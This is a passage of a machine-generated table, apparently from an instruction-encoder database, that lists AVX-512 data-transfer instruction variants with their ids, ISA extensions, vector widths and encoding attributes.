MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4422 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4423 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4424 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4425 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4426 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4427 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4494 VPMOVW2M VPMOVW2M_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4495 VPMOVW2M VPMOVW2M_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4496 VPMOVW2M VPMOVW2M_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4539 VPMOVM2W VPMOVM2W_XMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4540 VPMOVM2W VPMOVM2W_YMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4541 VPMOVM2W VPMOVM2W_ZMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4560 VPMOVM2B VPMOVM2B_XMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: 4561 VPMOVM2B VPMOVM2B_YMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: 4562 VPMOVM2B VPMOVM2B_ZMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: 4577 VPMOVM2D VPMOVM2D_XMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 4578 VPMOVM2D VPMOVM2D_YMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 4579 VPMOVM2D VPMOVM2D_ZMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 4605 VMOVLHPS VMOVLHPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: 4671 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4672 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4673 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4674 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4675 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4676 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4696 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4697 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4698 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4699 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4700 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4701 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4717 VPMOVSQD VPMOVSQD_YMMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4718 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4719 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4720 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4721 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4722 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4723 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4724 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4725 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4726 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4727 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4728 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4735 VPMOVWB VPMOVWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4736 VPMOVWB VPMOVWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4737 VPMOVWB VPMOVWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4738 VPMOVWB VPMOVWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4739 VPMOVWB VPMOVWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4740 VPMOVWB VPMOVWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4862 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4863 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4864 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 4865 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4866 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4867 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4868 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 4869 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4870 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4871 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4872 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 4873 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4878 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4879 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4880 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4881 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4882 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4883 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4908 VPMOVUSDW VPMOVUSDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 4909 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4910 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 4911 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 4912 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 4913 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5292 VPMOVQ2M VPMOVQ2M_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES: 5293 VPMOVQ2M VPMOVQ2M_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES: 5294 VPMOVQ2M VPMOVQ2M_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES: 5515 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5516 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5517 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5518 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5519 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5520 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5521 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5522 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5523 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5524 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5525 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5526 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5535 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5536 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5537 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5538 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5539 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5540 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5627 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5628 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5629 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5630 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5631 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5632 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5636 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5637 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5638 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5639 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5640 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5641 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5642 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5643 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5644 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5645 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5646 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5647 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5665 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5666 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5667 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5668 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5669 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5670 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5671 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5672 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5673 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5674 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5675 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5676 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT 5902 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5903 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5904 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5905 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5906 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 5907 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5931 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5932 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5933 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5934 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5935 VPMOVUSWB VPMOVUSWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5936 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5961 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX 5962 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5963 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX 5964 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5965 VPMOVSWB VPMOVSWB_YMMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX 5966 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5990 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 5991 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5992 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 5993 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 5994 VPMOVSXWD 